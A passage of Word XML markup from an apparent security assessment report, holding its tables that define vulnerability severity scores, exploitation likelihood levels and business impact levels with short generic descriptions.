                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="980000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="980000"/>
              </w:rPr>
              <w:t>7-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1BD70292" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>The vulnerability poses an urgent threat to the organization, and remediation should be prioritized.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="278A6679" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:trHeight w:val="795"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1C232"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FC1E651"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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3CAD6EA5" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="F1C232"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="647A72C7" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="F1C232"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="F1C232"/>
              </w:rPr>
              <w:t>4-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48921708" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="28E2C82A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Successful exploitation is possible and may result in notable disruption of business functionality. This vulnerability should be remediated when feasible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="50B5D392" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:trHeight w:val="672"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="38761D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0389FE43"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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5FEBFCB2" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="93C47D"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7B4A26E1" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="38761D"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="38761D"/>
              </w:rPr>
              <w:t>1-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="66C28D5B" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>The vulnerability poses a negligible/minimal threat to the organization. The presence of this vulnerability should be noted and remediated if possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="0DADC1E3" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:trHeight w:val="657"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A825703"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Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2550F92A" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E738964" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="404040"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="404040"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="216A7F99" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="28E2C82A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">These findings have no clear threat to the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>organization, but</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> may cause business processes to function differently than desired or reveal sensitive information about the company.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DF3E8DF" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_n2vg1pp2wwur"/>
      <w:bookmarkStart w:id="22" w:name="_Toc1661943102"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:t>Exploitation Likelihood Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a4"/>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6675"/>
      </w:tblGrid>
      <w:tr w:rsidR="00444C92" w14:paraId="663B0251" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="713990D2" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4875B203" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="09B79D13" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00D4C67B" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6675" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7DCF031E" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exploitation methods are well-known and can be performed using publicly available tools. Low-skilled attackers and automated tools could successfully exploit </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>the vulnerability</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> with minimal difficulty.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="6C8A5020" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="641194A0" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6675" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="117FBD35" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="28E2C82A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Exploitation methods are well-known, may be performed using public tools, but require configuration. Understanding of the underlying system is required for successful exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="404B9E7C" w14:textId="77777777" w:rsidTr="28E2C82A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2685" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="93C47D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1130CC78" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6675" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1820E05A" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="28E2C82A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="28E2C82A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Exploitation requires deep understanding of the underlying systems or advanced technical skills. Precise conditions may be required for successful exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="300BC0F5" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7D432F" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="00444C92">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc1113748474"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Business Impact Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>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444C92" w14:paraId="23B4F9CA" w14:textId="77777777" w:rsidTr="008A21E0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32876619" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F64A906" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="5DC117B3" w14:textId="77777777" w:rsidTr="008A21E0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E06666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70DF6D1B" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Major</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4669A3E3" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Successful exploitation may result in large disruptions of critical business functions across the organization and significant financial damage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="4F64012F" w14:textId="77777777" w:rsidTr="008A21E0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53B71EDE" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3328199E" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Successful exploitation may cause significant disruptions to non-critical business functions.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="246B9C9D" w14:textId="77777777" w:rsidR="00444C92" w:rsidRDefault="00444C92" w:rsidP="008A21E0">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00444C92" w14:paraId="342DB403" w14:textId="77777777" w:rsidTr="008A21E0">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2655" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="93C47D"/>
